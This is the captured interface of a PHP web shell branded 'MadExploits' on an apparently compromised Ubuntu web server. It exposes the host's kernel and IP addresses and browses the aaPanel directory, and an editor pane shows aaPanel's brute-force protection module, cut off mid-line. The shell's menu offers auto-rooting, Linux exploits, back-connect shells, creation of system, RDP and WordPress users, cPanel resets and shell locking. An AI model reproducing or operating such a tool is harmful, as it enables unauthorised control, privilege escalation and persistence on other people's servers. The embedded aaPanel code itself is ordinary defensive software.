Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.225.56.198
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
class_v2 /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
btdockerModelV2
[ DIR ]
drwxr-xr-x
crontabModelV2
[ DIR ]
drwxr-xr-x
databaseModelV2
[ DIR ]
drwxr-xr-x
firewallModelV2
[ DIR ]
drwxr-xr-x
logsModelV2
[ DIR ]
drwxr-xr-x
monitorModelV2
[ DIR ]
drwxr-xr-x
panelModelV2
[ DIR ]
drwxr-xr-x
power_mta
[ DIR ]
drwxr-xr-x
projectModelV2
[ DIR ]
drwxr-xr-x
safeModelV2
[ DIR ]
drwxr-xr-x
safe_warning_v2
[ DIR ]
drwxr-xr-x
ssl_domainModelV2
[ DIR ]
drwxr-xr-x
virtualModelV2
[ DIR ]
drwxr-xr-x
wp_toolkit
[ DIR ]
drwxr-xr-x
acme_v3.py
133.98
KB
-rw-r--r--
ajax_v2.py
95.41
KB
-rw-r--r--
apache_v2.py
17.28
KB
-rw-r--r--
backup_bak_v2.py
24.86
KB
-rw-r--r--
breaking_through.py
47.94
KB
-rw-r--r--
cloud_stora_upload_v2.py
19.27
KB
-rw-r--r--
common_v2.py
12.45
KB
-rw-r--r--
config_v2.py
165.36
KB
-rw-r--r--
crontab_ssl_v2.py
1.85
KB
-rw-r--r--
crontab_v2.py
111.93
KB
-rw-r--r--
data_v2.py
36.54
KB
-rw-r--r--
database_v2.py
125.54
KB
-rw-r--r--
datatool_v2.py
5.83
KB
-rw-r--r--
db_mysql_v2.py
11.41
KB
-rw-r--r--
db_v2.py
11.04
KB
-rw-r--r--
dk_db.py
18.34
KB
-rw-r--r--
download_file_v2.py
2.54
KB
-rw-r--r--
fastcgi_client_two_v2.py
12.26
KB
-rw-r--r--
fastcgi_client_v2.py
6.89
KB
-rw-r--r--
file_execute_deny_v2.py
10.34
KB
-rw-r--r--
files_v2.py
149.12
KB
-rw-r--r--
firewall_new_v2.py
22.4
KB
-rw-r--r--
firewalld_v2.py
11.09
KB
-rw-r--r--
firewalls_v2.py
17.44
KB
-rw-r--r--
flask_compress_v2.py
5.12
KB
-rw-r--r--
flask_sockets_v2.py
3.75
KB
-rw-r--r--
ftp_log_v2.py
21.72
KB
-rw-r--r--
ftp_v2.py
16.17
KB
-rw-r--r--
http_requests_v2.py
24.25
KB
-rw-r--r--
jobs_v2.py
36.98
KB
-rw-r--r--
letsencrypt_v2.py
12.85
KB
-rw-r--r--
log_analysis_v2.py
12.23
KB
-rw-r--r--
monitor_v2.py
13.53
KB
-rw-r--r--
one_key_wp_v2.py
75.79
KB
-rw-r--r--
panelControllerV2.py
4.97
KB
-rw-r--r--
panelDatabaseControllerV2.py
5.76
KB
-rw-r--r--
panelDockerControllerV2.py
5.86
KB
-rw-r--r--
panelFireControllerV2.py
4.65
KB
-rw-r--r--
panelModControllerV2.py
5.13
KB
-rw-r--r--
panelProjectControllerV2.py
6.07
KB
-rw-r--r--
panelSafeControllerV2.py
4.65
KB
-rw-r--r--
panel_api_v2.py
10.43
KB
-rw-r--r--
panel_auth_v2.py
33.21
KB
-rw-r--r--
panel_backup_v2.py
102.56
KB
-rw-r--r--
panel_dns_api_v2.py
22.2
KB
-rw-r--r--
panel_http_proxy_v2.py
11.33
KB
-rw-r--r--
panel_lets_v2.py
43.61
KB
-rw-r--r--
panel_mssql_v2.py
4.48
KB
-rw-r--r--
panel_mysql_v2.py
7.55
KB
-rw-r--r--
panel_php_v2.py
24.78
KB
-rw-r--r--
panel_ping_v2.py
2.88
KB
-rw-r--r--
panel_plugin_v2.py
125.11
KB
-rw-r--r--
panel_push_v2.py
23.78
KB
-rw-r--r--
panel_redirect_v2.py
34.02
KB
-rw-r--r--
panel_restore_v2.py
11.04
KB
-rw-r--r--
panel_site_v2.py
343.73
KB
-rw-r--r--
panel_ssl_v2.py
75.34
KB
-rw-r--r--
panel_task_v2.py
28.7
KB
-rw-r--r--
panel_video_V2.py
1.88
KB
-rw-r--r--
panel_warning_v2.py
68.71
KB
-rw-r--r--
password_v2.py
8.09
KB
-rw-r--r--
plugin_auth_v2.py
3.14
KB
-rw-r--r--
plugin_deployment_v2.py
28.85
KB
-rw-r--r--
san_baseline_v2.py
51.13
KB
-rw-r--r--
site_dir_auth_v2.py
17.67
KB
-rw-r--r--
ssh_security_v2.py
45.66
KB
-rw-r--r--
ssh_terminal_v2.py
58.86
KB
-rw-r--r--
system_v2.py
44.77
KB
-rw-r--r--
userRegister_v2.py
6.74
KB
-rw-r--r--
user_login_v2.py
21.2
KB
-rw-r--r--
vilidate_v2.py
4.94
KB
-rw-r--r--
wxapp_v2.py
5.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : breaking_through.py
# coding: utf-8 # ------------------------------------------------------------------- # aaPanel # ------------------------------------------------------------------- # Copyright (c) 2015-2017 aaPanel(www.aapanel.com) All rights reserved. # ------------------------------------------------------------------- # Author: hezhihong <hezhihong@aapanel.com> # ------------------------------------------------------------------- # ------------------------------ # 防爆破、编译器类 #------------------------------ import os,sys,time,db,json import shlex panel_path = '/www/server/panel' if not os.name in ['nt']: os.chdir(panel_path) if not 'class/' in sys.path: sys.path.insert(0, 'class/') if not 'class_v2/' in sys.path: sys.path.insert(0, 'class_v2/') import public from public.regexplib import match_ipv4,match_ipv6 from safeModelV2.base import safeBase # from pyroute2 import IPSet, NetlinkError try: from pyroute2 import IPSet, NetlinkError except: public.ExecShell("btpip install pyroute2") from pyroute2 import IPSet, NetlinkError class main(safeBase): _config={} def __init__(self): self._types={'white':'aapanel.ipv4.whitelist','black':'aapanel.ipv4.blacklist'} self._types_system={'white':'whitelist','black':'blacklist'} self._config_file='/www/server/panel/data/breaking_through.json' try: self._config_file='{}/data/breaking_through.json'.format(public.get_panel_path()) except: pass self._breaking_white_file='{}/data/breaking_white.conf'.format(public.get_panel_path()) self._limit_file='{}/data/limit_login.pl'.format(public.get_panel_path()) self.__script_py = public.get_panel_path() + '/script/breaking_through_check.py' self.__complier_group='aapanel_complier' self.__gcc_path="" if os.path.exists("/usr/bin/gcc"): self.__gcc_path="/usr/bin/gcc" else:self.__gcc_path=public.ExecShell('which gcc')[0].strip() self.__log_type='Brute force protection' self.__write_log=True with db.Sql() as sql: sql = sql.dbfile("/www/server/panel/data/default.db") black_white_sql = '''CREATE TABLE IF NOT EXISTS `black_white` ( `id` INTEGER PRIMARY KEY AUTOINCREMENT, `ip` VARCHAR(45), `ps` VARCHAR(40), `add_type` VARCHAR(20), `add_time` TEXT, `timeout` INTEGER, `black_reason` INTEGER )''' #black_reason 0 手动添加 1 ssh爆破ip 2 aapanel爆破ip 3 ftp爆破ip sql.execute(black_white_sql, ()) sql.close() def init_ipset(self): """ @name 初始化ipset """ # try: # # 在循环外只查询指定 ipset集合 # check_result = public.ExecShell('ipset list aapanel.ipv4.whitelist && ipset list aapanel.ipv4.blacklist')[0] # for i in self._types: # # check_result=public.ExecShell('ipset list')[0] # if self._types[i] not in check_result: # public.ExecShell('ipset create '+self._types[i]+' hash:net timeout 0') # rule_type='DROP' # if i=='white':rule_type='ACCEPT' # if not public.ExecShell('iptables-save | grep "match-set '+self._types[i]+'"')[0]: # public.ExecShell('iptables -I INPUT -m set --match-set '+self._types[i]+' src -j '+rule_type) # except:pass from pyroute2 import IPSet, NetlinkError import socket try: with IPSet() as ipset: # 创建或检查ipset集合 for i in self._types: try: # 尝试获取集合 ipset.get_set_byname(self._types[i]) except NetlinkError as e: if e.code == 2: # ENOENT - No such file or directory # 集合不存在,创建新的ipset集合 public.print_log(f"Creating ipset {self._types[i]}") ipset.create(name=self._types[i], stype='hash:net', family=socket.AF_INET, timeout=0) else: raise # 设置iptables规则 for i in self._types: rule_type = 'DROP' if i == 'white': rule_type = 'ACCEPT' if not public.ExecShell('iptables-save | grep "match-set {}"'.format(self._types[i]))[0]: public.ExecShell('iptables -I INPUT -m set --match-set {} src -j {}'.format(self._types[i], rule_type)) except: pass def type_conversion(self,data,types): if types =='bool': try: if data=='true': return True else:return False # data=bool(data) # return data except:return False elif types =='int': try: if type(data)=='int':return data data=int(data) return data except:return 0 def set_config(self,get): """ @name 设置防护配置 """ self._config=self.read_config() if 'global_status' in get or 'username_status' in get or 'ip_status' in get: self._config['global_status']=self.type_conversion(get.global_status,'bool') if 'global_status' in get else self._config['global_status'] self._config['username_status']=self.type_conversion(get.username_status,'bool') if 'username_status' in get else self._config['username_status'] self._config['ip_status']=self.type_conversion(get.ip_status,'bool') if 'ip_status' in get else self._config['ip_status'] public.writeFile(self._config_file,json.dumps(self._config)) public.write_log_gettext(self.__log_type, 'Configuration modification successful!') return public.return_message(0, 0, public.lang("Setting successful")) try: # if 'ip_command' in get: try: get.ip_command=get.ip_command.strip() except:pass if get.ip_command=='' and not self.type_conversion(get.ip_ipset_filter,'bool'): return public.return_message(-1, 0, public.lang("Please enable at least one command and firewall")) self._config['based_on_username']={"limit":self.type_conversion(get.username_limit,'int'),"count":self.type_conversion(get.username_count,'int'),"type":self.type_conversion(get.username_type,'int'),"limit_root":self.type_conversion(get.username_limit_root,'bool')} self._config['based_on_ip']={"limit":self.type_conversion(get.ip_limit,'int'),"count":self.type_conversion(get.ip_count,'int'),"command":get.ip_command,"ipset_filter":self.type_conversion(get.ip_ipset_filter,'bool')} self._config['history_limit']=self.type_conversion(get.history_limit,'int') self._config['global_status']=self._config['global_status'] self._config['username_status']=self._config['username_status'] self._config['ip_status']=self._config['ip_status'] public.writeFile(self._config_file,json.dumps(self._config)) except Exception as ee: public.print_log('ee:{}'.format(ee)) #写日志 if self.__write_log: public.write_log_gettext(self.__log_type, 'Configuration modification successful!') return public.return_message(0, 0, public.lang("Setting successful")) def get_config(self,get): """ @name 获取防护配置 """ self._config=self.read_config() try: tmp_config=public.readFile(self._config_file) self._config = json.loads(tmp_config) return public.return_message(0,0,self._config) except: pass return public.return_message(0,0,self._config) def read_config(self): """ @name 读取防护配置 """ self._config={"based_on_username":{"limit":5,"count":8,"type":0,"limit_root":False},"based_on_ip":{"limit":5,"count":8,"command":"","ipset_filter":True},"history_limit":60,"history_start":0,'global_status':True,'username_status':False,'ip_status':False} if not os.path.exists(self._config_file): public.writeFile(self._config_file,json.dumps(self._config)) return self._config tmp_config = public.readFile(self._config_file) if not tmp_config: return self._config try: self._config = json.loads(tmp_config) except: public.writeFile(self._config_file,json.dumps(self._config)) return self._config return self._config def format_date_to_timestamp(self,time_string): """ @name将时间转化为字符串 """ from datetime import datetime # 给定的时间字符串 # time_string = "Jul 16 02:33:09" # 当前年份 current_year = datetime.now().year # 构造完整的日期时间字符串 full_time_string = f"{current_year} {time_string}" # 定义日期时间格式 date_format = "%Y %b %d %H:%M:%S" # 解析时间字符串 parsed_time = datetime.strptime(full_time_string, date_format) # 转换为时间戳 timestamp = parsed_time.timestamp() return timestamp # # 输出时间戳 # print("Timestamp:", timestamp) # def get_ssh_info_test(self,get): # limit_time=int(self._config['based_on_username']['limit'])*60 # now_time=old_limit=time.time() # start_time=public.format_date(times=now_time-limit_time) # ssh_info=self.get_ssh_intrusion(start_time) # result,ip_total=self.get_ssh_info(ssh_info) # return result def get_ssh_info(self,result, data=[], keyword='', get_data: bool = False): """ @获取SSH信息 @param since_time:'2024-07-01 05:39:30' """ self._config=self.read_config() ssh_info_list=data keys=['journalctl_fail','journalctl_connection',"log_file_fail","log_file_connection"] ip_total={} limit_time=self._config['based_on_ip']['limit']*60 now_time=int(time.time()) for key in keys: if key in result and result[key]: line_list=result[key].split('\n') for line in line_list: if line =='' or len(line)<50 :continue # ssh_info={"user":"","exptime":"","ip":"","authservice":"aapanel safe","country_code":"","logintime":"","service":"","country_name":"","timeleft":"","lock_status":'unlock'} ssh_info={"user":"","exptime":"","ip":"","authservice":"","country_code":"","logintime":"","service":"","country_name":"","timeleft":"","lock_status":'unlock'} user='root' ip='127.0.0.1' #取user try: user=line.split(' for ',1)[1].split(' ')[0] except: pass #取ip try: ip=line.split(' from ',1)[1].split(' ')[0] except: pass ssh_info['service']='sshd' ssh_info['ip']=ip ssh_info['user']=user check_result=public.ExecShell('ipset test aapanel.ipv4.blacklist '+ip)[1] if 'is in set' in check_result:ssh_info['lock_status']='lock' #取时间 try: tmp_time=self.format_date_to_timestamp(line[:15]) except: tmp_time=public.to_date(format="%Y-%m-%dT%H:%M:%S.%f%z",times=line[:32]) logintime=public.format_date(times=tmp_time) tmp_exp_time=tmp_time+limit_time exp_time=public.format_date(times=tmp_exp_time) timeleft=0 if now_time>tmp_exp_time else tmp_exp_time-now_time ssh_info["exptime"]=exp_time ssh_info["timeleft"]=timeleft ssh_info['logintime']=logintime if ip not in ip_total: ip_total[ip]={'count':1,'ssh_infos':[]} else: ip_total[ip]['count']+=1 if get_data: if keyword !='' and (keyword in 'sshd' or keyword in ssh_info['authservice'] or keyword in ip or keyword in ssh_info['user'] or keyword in logintime): ip_total[ip]['ssh_infos'].append(ssh_info) ssh_info_list.append(ssh_info) if keyword =='': ip_total[ip]['ssh_infos'].append(ssh_info) ssh_info_list.append(ssh_info) return ssh_info_list, ip_total def get_ssh_intrusion(self,since_time): """ @获取SSH爆破次数 @param since_time:'2024-07-01 05:39:30' """ test_string="""Aug 4 05:22:56 cpanel76262789 sshd[2112635]: Failed password for root from 218.92.0.52 port 20956 ssh2 Aug 4 05:23:01 cpanel76262789 sshd[2112635]: Failed password for root from 218.92.0.52 port 20956 ssh2 Aug 4 05:23:04 cpanel76262789 sshd[2112635]: Failed password for root from 218.92.0.52 port 20956 ssh2 Aug 4 05:23:08 cpanel76262789 sshd[2112635]: Failed password for root from 218.92.0.52 port 20956 ssh2 Aug 4 05:23:11 cpanel76262789 sshd[2112635]: Failed password for root from 218.92.0.52 port 20956 ssh2 Aug 4 05:23:18 cpanel76262789 sshd[2112655]: Failed password for root from 218.92.0.52 port 41852 ssh2 Aug 4 05:23:23 cpanel76262789 sshd[2112655]: Failed password for root from 218.92.0.52 port 41852 ssh2 Aug 4 05:47:03 cpanel76262789 sshd[2114164]: Failed password for root from 49.235.86.107 port 54144 ssh2 Aug 4 05:47:13 cpanel76262789 sshd[2114181]: Failed password for root from 81.192.46.48 port 39134 ssh2 Aug 4 05:49:10 cpanel76262789 sshd[2114252]: Failed password for root from 188.235.158.112 port 41790 ssh2 """ result = {'journalctl_fail':"",'journalctl_connection':"","log_file_fail":"","log_file_connection":""} if os.path.exists("/etc/debian_version"): version = public.readFile('/etc/debian_version').strip() if 'bookworm' in version or 'jammy' in version or 'impish' in version: version = 12 else: try: version = float(version) except: version = 11 if version >= 12: result['journalctl_fail'] = public.ExecShell("journalctl -u ssh --no-pager --since '"+since_time+"'|grep -a 'Failed password for' |grep -v 'invalid'")[0] result['journalctl_connection']=public.ExecShell("journalctl -u ssh --no-pager --since '"+since_time+"'|grep -a 'Connection closed by authenticating user' |grep -a 'preauth'")[0] return result for sfile in self.get_ssh_log_files(None): start_timestramp=public.to_date(times=since_time) try: try: tmp_result = public.ExecShell("cat %s|grep -a 'Failed password for' |grep -v 'invalid'" % (sfile))[0].strip() add_result=[] line_list=tmp_result.split('\n') for line in line_list: try: tmp_time=self.format_date_to_timestamp(line[:15]) except: tmp_time=public.to_date(format="%Y-%m-%dT%H:%M:%S.%f%z",times=line[:32]) # print('tmp_time:{}'.format(public.format_date(times=tmp_time))) if start_timestramp<=tmp_time: add_result.append(line) add_string='\n'.join(add_result) result['log_file_fail']+=add_string except:pass try: tmp_result= public.ExecShell("cat %s|grep -a 'Connection closed by authenticating user' |grep -a 'preauth'" % (sfile))[0].strip() add_result=[] line_list=tmp_result.split('\n') for line in line_list: try: tmp_time=self.format_date_to_timestamp(line[:15]) except: tmp_time=public.to_date(format="%Y-%m-%dT%H:%M:%S.%f%z",times=line[:32]) # print('tmp_time:{}'.format(public.format_date(times=tmp_time))) if start_timestramp<=tmp_time: add_result.append(line) add_string='\n'.join(add_result) result['log_file_connection']+=add_string except:pass except: pass # self.set_ssh_cache(data) return result def check_black_white_ipset(self): """ @name 检测ipset黑白名单 """ for list_type,list_name in self._types.items(): ip_info=public.M('black_white').where('add_type=?', (list_type,)).select() if list_type=='white':#白名单检测 for ip in ip_info: public.ExecShell('ipset add '+list_name+' '+ip['ip']+' timeout 0') else:#黑名单检测 for ip in ip_info: timeout=timeleft=0 if int(ip['timeout'])!=0: add_time=int(public.to_date(times=ip['add_time'])) now_time=int(time.time()) exptime=add_time+int(ip['timeout']) timeleft=exptime-now_time timeout=timeleft if timeleft>0: public.ExecShell('ipset add '+list_name+' '+ip['ip']+' timeout '+str(timeout)) else: public.M('black_white').where('id=?', (ip['id'],)).delete() else: public.ExecShell('ipset add '+list_name+' '+ip['ip']+' timeout 0') return def cron_method(self): """ @name 防爆破检测方法 """ self.init_ipset() # public.print_log('Starting through check task execution') self.check_black_white_ipset() self._config=self.read_config() if not self._config['global_status']: return # public.print_log('防爆破脚本开始运行...') aapanel_login_info=[] now_time=old_limit=time.time() if self._config['username_status']: limit_time=int(self._config['based_on_username']['limit'])*60 count=int(self._config['based_on_username']['count']) start_time=public.format_date(times=now_time-limit_time) aapanel_login_info=public.M('logs').where('type=? and addtime>=? and log LIKE ?',('Login',start_time,'%is incorrec%')).select() aapanel_login_limit=now_time+limit_time try: old_limit=int(public.readFile(self._limit_file)) except:old_limit=now_time if len(aapanel_login_info)>=count and old_limit<=now_time: public.writeFile(self._limit_file,str(aapanel_login_limit)) # public.print_log('统计到面板登录最大尝试次数') # public.print_log('当前时间为:{}'.format(public.format_date(times=now_time))) # public.print_log('限制时间为:{}'.format(public.format_date(times=aapanel_login_limit))) if self._config['ip_status']: #ssh login #取ssh记录 limit_time=int(self._config['based_on_ip']['limit'])*60 # limit_time=2592000 start_time=public.format_date(times=now_time-limit_time) ip_count=int(self._config['based_on_ip']['count']) ssh_info=self.get_ssh_intrusion(start_time) _, ip_total = self.get_ssh_info(ssh_info) # ssh最大ip限制处理 for ip, details in ip_total.items(): if int(details['count'])<ip_count:continue # public.print_log('统计到ssh登录最大尝试次数') if self._config['based_on_ip']['ipset_filter']: # public.print_log('防火墙防护状态打开') args = public.dict_obj() args.types = 'black' args.ips = ip args.cron = 'true' args.black_reason = 1 self.add_black_white(args) command = self._config['based_on_ip']['command'] if command != '': public.ExecShell('nohup ' + str(command) + ' &') # public.print_log('Breaking through check task has been executed') # time.sleep(60) return def is_shell_command(self,command_string): # 尝试使用shlex.split处理字符串 try: # 分割字符串 split_command = shlex.split(command_string) # 检查是否有至少一个非空字符串 if split_command: # 检查第一个元素是否可能是命令名 command_name = split_command[0] # 检查命令名是否只包含字母、数字或下划线 if all(c.isalnum() or c == '_' for c in command_name): return True except ValueError: # 如果shlex.split抛出ValueError,那么可能不是一个合法的shell命令 pass return False def get_history_record(self,get): """ @name 获取历史记录,能匹配关键词搜索 {'error_logins':[ { "timeleft": "356099", #解封剩余分钟数 "user": "anonymous", #用户名 "exptime": "2025-04-09 10:21:01", #解封时间 "ip": "34.22.135.234", "authservice": "pure-ftpd",#身份验证服务 "country_code": "BE",#所在国家简称 "logintime": "2024-08-02 10:21:01",#登录时间 "service": "system", #服务 "country_name": "Belgium"#所在国家名称 "lock_status":0 #0(未封锁)/1(封锁中) }] """ self._config=self.read_config() now_time=int(time.time()) keyword=get.keyword.strip() result=[] limit_time=int(self._config['history_limit'])*60 #默认最近1小时 aapanel_user=public.M('users').where("id=?", (1,)).getField('username') start_time=public.format_date(times=now_time-limit_time) if self._config['history_start'] !=0 and int(time.time())-int(self._config['history_start'])<limit_time: start_time=public.format_date(times=self._config['history_start']) if get.types == 'login': login_info=public.M('logs').where('type=? and addtime>=? and log LIKE ?',('Login',start_time,'%is incorrec%')).select() if len(login_info)>0: for i in login_info: ip=i['log'].split('Login IP:')[1].strip() ip=ip.split(':')[0] exptime=int(time.time())-limit_time-public.to_date(i['addtime']) if exptime<0:exptime=0 timeleft= 0 if now_time>public.to_date(i['addtime'])+limit_time else now_time-(public.to_date(i['addtime'])+limit_time) tt_time=public.format_date(times=public.to_date(times=i['addtime'])+limit_time) single_info={"timeleft":timeleft, "user":aapanel_user, "ip":ip, "authservice":"aapanel", "exptime":tt_time,#当前时间-超时时间-登录时间 "country_code":"", "logintime":i['addtime'], "service":"aapanel", "country_name":"" } if keyword !='' and (keyword in aapanel_user or keyword in ip or keyword in "aapanel" or keyword in i['addtime']) :result.append(single_info) if keyword =='':result.append(single_info) #取ssh记录 ssh_info=self.get_ssh_intrusion(start_time) result,ip_total=self.get_ssh_info(ssh_info, result, keyword=keyword, get_data=True) elif get.types == 'ip': ip_info=public.M('black_white').where('add_type=? and timeout !=? and add_time>?', ('black',0,start_time )).select() for i in ip_info: if keyword !='' and (keyword not in i['ip'] and keyword in "aapanel" and keyword in i['addtime']) :continue add_time=int(public.to_date(times=i['add_time'])) exptime=add_time+i['timeout'] timeleft= 0 if now_time>exptime else exptime-now_time single_info={"timeleft":timeleft//60, "ip":i['ip'], "exptime":public.format_date(times=exptime), "begin":i['add_time'], "country_code":"", "note":"", "action":"aapanel", "country_name":"", 'lock_status':'blocked', 'block_reason':'Trigger SSH explosion-proof rule breaking' if i['black_reason']==1 else 'Trigger aapanel explosion-proof rule breaking' } result.append(single_info) # if len(result)==0: # #取ssh记录 # ssh_info=self.get_ssh_intrusion(start_time) # result,ip_total=self.get_ssh_info(ssh_info,result,keyword=get.keyword) # elif get.types == 'ip': # elif get.types == 'login': #取分页数据 data = self.get_page(get,result) return public.return_message(0,0,data) def set_history_record_limit(self,get=None): """ @name 设置历史记录时间 """ self._config=self.read_config() try: if 'history_limit' in get: self._config['history_limit']=self.type_conversion(get.history_limit,'int') #写日志 if self.__write_log: public.write_log_gettext(self.__log_type, 'Set the duration of failed login attempts (in minutes) to [{}] minutes'.format(self._config['history_limit'])) if 'history_start' in get: self._config['history_start']=self.type_conversion(get.history_start,'int') #写日志 if self.__write_log: public.write_log_gettext(self.__log_type, 'History has been cleared!') except Exception as ee: public.print_log('ee:{}'.format(ee)) public.writeFile(self._config_file,json.dumps(self._config)) return public.return_message(0, 0, public.lang("Setting successful")) def clear_history_record_limit(self,get): """ @name 移除并清空历史记录 """ self.init_ipset() get.history_start=int(time.time()) self.set_history_record_limit(get) #清除历史记录 clear_ips=public.M('black_white').where('add_type=? and timeout !=?', ('black',0)).select() for clear_info in clear_ips: check_result=public.ExecShell('ipset test aapanel.ipv4.blacklist '+clear_info['ip'])[1] if 'is in set' in check_result: public.ExecShell('ipset del '+self._types['black']+' '+clear_info['ip']) public.M('black_white').where('add_type=? and timeout !=?', ('black',0)).delete() #写日志 if self.__write_log: public.write_log_gettext(self.__log_type, 'The history has been cleared and the blocked IP has been cleared') return public.return_message(0, 0, public.lang("Setting successful")) def get_black_white(self,get): """ @name 获取黑/白名单 """ ip_list=[] result=public.M('black_white').where('add_type=? and black_reason=?', (get.types,0)).select() return public.return_message(0,0,result) def add_black_white(self,get): """ @name 添加、编辑、删除黑/白名单 """ self.init_ipset() self.init_complier() if 'black_reason' not in get:get.black_reason=0 ip_infos=get.ips.strip().split('\\n') ip_list=[] #检测ip是否正确 for i in ip_infos: if i=='':continue ps='' i_list=i.split('#',1) ip=i_list[0].replace('"', '').strip() if len(i_list)>1: ps=i_list[1].strip() single_info={"ip":ip,"ps":ps} if public.is_ipv4(ip): ip_list.append(single_info) else: public.print_log('ip:{}'.format(ip)) return {'status': -1, "timestamp": int(time.time()), "message": {'result':'[{}] IP address incorrect'.format(ip)}} if len(ip_list)==0: #清空黑/白名单 public.ExecShell('ipset flush '+self._types[get.types]) public.M('black_white').where('add_type=? and black_reason =?', (get.types,0)).delete() self.writeListFile() if self.__write_log: public.write_log_gettext(self.__log_type, 'The black and white list operation settings have been executed') return public.return_message(0, 0, public.lang("The operation has been executed")) if 'ps' not in get and 'cron' not in get: public.ExecShell('ipset flush '+self._types[get.types]) public.M('black_white').where('add_type=? and black_reason =?', (get.types,0)).delete() timeout=0 if get.types=='black' and 'hand' not in get: timeout=int(self._config['based_on_ip']['limit']) *60 check_result=public.ExecShell('ipset list')[0] if self._types[get.types] not in check_result: public.ExecShell('ipset create '+self._types[get.types]+' hash:net timeout 0') # success_list=[] # failed_list=[] try: for ip_info in ip_list: ip=ip_info['ip'] ps=ip_info['ps'] if ps=='' and len(ip_list)==1 and 'ps' in get:ps=get.ps if ip=='':continue if 'cron' in get and get.types=='black' and public.M('black_white').where('ip=? and add_type=?', (ip, 'white')).count(): # public.print_log('匹配到白名单规则,跳过:{}'.format(ip)) continue #解封黑名单 if 'clear_black' in get: public.ExecShell('ipset del '+self._types['black']+' '+ip ) public.M('black_white').where('ip=?', (ip,)).delete() if get.types=='black' and 'hand' not in get: if ip=='127.0.0.1': # public.print_log('The IP address [{}] is the local IP address and cannot be added to the blacklist'.format(ip)) continue if not public.M('black_white').where('ip=? and add_type=?', (ip, get.types)).count(): public.M('black_white').add('ip,add_type,ps,add_time,timeout,black_reason',(ip, get.types,ps,time.strftime('%Y-%m-%d %X',time.localtime()),timeout,get.black_reason)) if public.M('black_white').where('ip=? and add_type=?', (ip, get.types)).count(): #写日志 if self.__write_log: public.write_log_gettext(self.__log_type, 'Successfully added IP [{}] to the interception system [{}]', (ip,self._types_system[get.types])) result=public.ExecShell('ipset add '+self._types[get.types]+' '+ip+' timeout '+str(timeout)) # if public.M('black_white').where('ip=? and add_type=?', (ip, get.types)).count(): # success_list.append(ip) # else: # failed_list.append(ip) except:pass # if len(success_list)>0: # message='The following IP addresses have been successfully added:【{}】'.format(",".join(success_list)) # if len(failed_list)>0: # message+='The following IP addresses have been failed added:【{}】'.format(",".join(failed_list)) self.writeListFile() # if self.__write_log: # public.write_log_gettext(self.__log_type, 'The black and white list operation settings have been executed') return {'status': 0, "timestamp": int(time.time()), "message": {'result':'The operation has been executed'}} # return public.return_message(0, 0, public.lang("The operation has been executed")) def writeListFile(self): result=public.M('black_white').where('add_type=?', ('white',)).select() if len(result)<1:return ip_list=[] for i in result: ip_list.append(i['ip']) ip_string=','.join(ip_list) public.writeFile(self._breaking_white_file,ip_string) return # def modify_black_white(self,get): # """ # @name 编辑黑/白名单 # """ # if public.M('black_white').where('id=?', (get.id, )).count(): # public.M('black_white').where('id=?',(get.id, )).setField('ps',get.ps) # return public.return_message(0, 0, public.lang("Edited successfully")) # def del_balck_white(self,get): # """ # @name 删除黑/白名单 # """ # # public.print_log('---------010') # #数据库内添加指定数据并返回数据库id # #rgs_obj.id = public.M('crontab').add('name,type,where1,where_hour,where_minute,echo,addtime,status,save,backupTo,sType,sName,sBody,urladdress',("续签Let's Encrypt证书",'day','',hour,minute,echo,time.strftime('%Y-%m-%d %X',time.localtime()),0,'','localhost','toShell','',shell,'')) # if not public.M('black_white').where('id=?', (get.id,)).count(): # public.M('black_white').where('id=?', (get.id,)).delete() # ip=public.M('black_white').where("id=?", (get.id,)).getField('ip') # # public.print_log('---------01') # types=public.M('black_white').where("id=?", (get.id,)).getField('add_type') # public.print_log('---------02') # public.print_log('id:{}'.format(get.id)) # public.M('black_white').where('id=?', (get.id,)).delete() # public.ExecShell('ipset del '+self._types[types]+' '+ip) # public.print_log('---------03') # return public.return_message(0, 0, public.lang("Delete successfully")) def check_local_ip_white(self,get): """ @name 编辑黑/白名单 """ if not public.M('black_white').where('ip=? and add_type=?', (get.ip, 'white')).count(): return public.return_message(-1, 0, public.lang("Your current IP address [{}] is not on the whitelist.", get.ip)) return public.return_message(0, 0, public.lang("Your current IP address [{}] is on the whitelist.", get.ip)) def panel_ip_white(self,get): """ @name 面板设置ip加白 """ get.ips=get.ip.strip() # from BTPanel import cache # limitip='' # try: # limitip = public.readFile('data/limitip.conf') # limitip=limitip.strip() # except: # limitip='' # if limitip=='':limitip=get.ip # else: # if get.ip not in limitip: # limitip=limitip+','+get.ip # public.writeFile('data/limitip.conf',limitip) # cache.set('limit_ip',[]) get.types='white' if 'ps' not in get: get.ps='your ip address' get.hand=True self.__write_log=False result=self.add_black_white(get) self.__write_log=True if result['status']==0: if self.__write_log: public.write_log_gettext(self.__log_type, 'Access IP [{}] successfully whitelisted'.format(get.ips)) return public.return_message(0, 0, public.lang("Added successfully")) else: return public.return_message(-1, 0, public.lang("Added failed")) def del_cron(self): cron_name='[Do not delete] breaking through check task' cron_path = public.GetConfigValue('setup_path') + '/www/server/cron/' try: cron_path = public.GetConfigValue('setup_path') + '/cron/' except: pass # python_path = '' # try: # python_path = public.ExecShell('which btpython')[0].strip("\n") # except: # try: # python_path = public.ExecShell('which python')[0].strip("\n") # except: # pass # if not python_path: return False if public.M('crontab').where('name=?',(cron_name,)).count(): cron_echo = public.M('crontab').where( "name=?", (cron_name, )).getField('echo') cron_id = public.M('crontab').where( "echo=?", (cron_echo, )).getField('id') args = {"id": cron_id} import crontab crontab.crontab().DelCrontab(args) del_cron_file = cron_path + cron_echo public.ExecShell( "crontab -u root -l| grep -v '{}'|crontab -u root -". format(del_cron_file)) return True def add_cron(self): cron_name='[Do not delete] breaking through check task' cron_path = public.GetConfigValue('setup_path') + '/www/server/cron/' try: cron_path = public.GetConfigValue('setup_path') + '/cron/' except: pass python_path = '' try: python_path = public.ExecShell('which btpython')[0].strip("\n") except: try: python_path = 